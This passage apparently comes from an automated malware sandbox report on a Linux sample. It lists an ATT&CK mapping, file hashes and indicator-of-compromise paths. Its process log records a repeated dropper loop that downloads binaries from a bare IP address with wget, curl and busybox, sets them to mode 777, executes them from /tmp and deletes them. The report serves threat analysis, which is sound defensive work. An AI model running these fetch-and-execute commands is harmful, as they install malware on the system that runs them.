  /bin/busybox wget http://216.126.231.240/bins/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:1653
- /bin/chmod
  chmod 777 UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - File and Directory Permissions Modification
  PID:1654
- /tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  ./UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  - Executes dropped EXE
  PID:1655
- /bin/rm
  rm UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
  2⤵
  PID:1656
- /usr/bin/wget
  wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:1657
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Writes file to tmp directory
  PID:1658
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:1659
- /bin/chmod
  chmod 777 nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - File and Directory Permissions Modification
  PID:1660
- /tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  ./nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  - Executes dropped EXE
  PID:1661
- /bin/rm
  rm nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
  2⤵
  PID:1662
- /usr/bin/wget
  wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:1663
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Writes file to tmp directory
  PID:1664
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:1665
- /bin/chmod
  chmod 777 zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - File and Directory Permissions Modification
  PID:1666
- /tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  ./zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  - Executes dropped EXE
  PID:1667
- /bin/rm
  rm zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
  2⤵
  PID:1668
- /usr/bin/wget
  wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:1669
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Writes file to tmp directory
  PID:1670
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:1671
- /bin/chmod
  chmod 777 UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - File and Directory Permissions Modification
  PID:1672
- /tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  ./UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  - Executes dropped EXE
  PID:1673
- /bin/rm
  rm UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
  2⤵
  PID:1674

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	1509	tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	1515	cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	1521	e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	1527	tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	1533	EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	1539	UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	1545	nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	1551	zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	1557	UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	1563	JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	1569	7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	1575	xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	1581	0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6	1587	GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
/tmp/GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6	1593	GHQSvRRZzQr32t14ob6SuBv7PTAiUJ9WG6
/tmp/xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc	1599	xlOEgUGoV15TQ9EiGYZUQSm5Hd3OFVUenc
/tmp/0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a	1605	0rvlShXKQQQwCW6h4WmFONt0VcxySU1H4a
/tmp/cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe	1611	cayWFU8o0VGt74yfWT1bYNSzBkMqiwstoe
/tmp/tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0	1617	tQIuvrbbio7fzWhKOlKGNsnIR7BXb2ckK0
/tmp/tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne	1623	tEAbDYpBZcwW2GewFLpWgQfUJR1X3SK9Ne
/tmp/e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz	1629	e8NickSVHHGc0CKiNoIeQQeLHFwsfykCoz
/tmp/JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ	1635	JXEnQ78yLWq2lqymnaci1mhgX8TrGOAUPQ
/tmp/7xcf066zx6JjlSH0geP2dCyq8I4938BMoG	1643	7xcf066zx6JjlSH0geP2dCyq8I4938BMoG
/tmp/EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo	1649	EfuuLaOesxwARQirEHUr8hwbo6uUPtCmWo
/tmp/UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw	1655	UgB7802yL8EGGk7pLs8LQPIEsBTddncmWw
/tmp/nZK2byWknzW1gXWixRxIyczawUsL7rR9c8	1661	nZK2byWknzW1gXWixRxIyczawUsL7rR9c8
/tmp/zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ	1667	zc4ow6JwkvxTlhTcvjPZwVGFRCJaJz9aOZ
/tmp/UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO	1673	UqErvkbtf2B3Udw2Pr1NVBYkh4u6biAJdO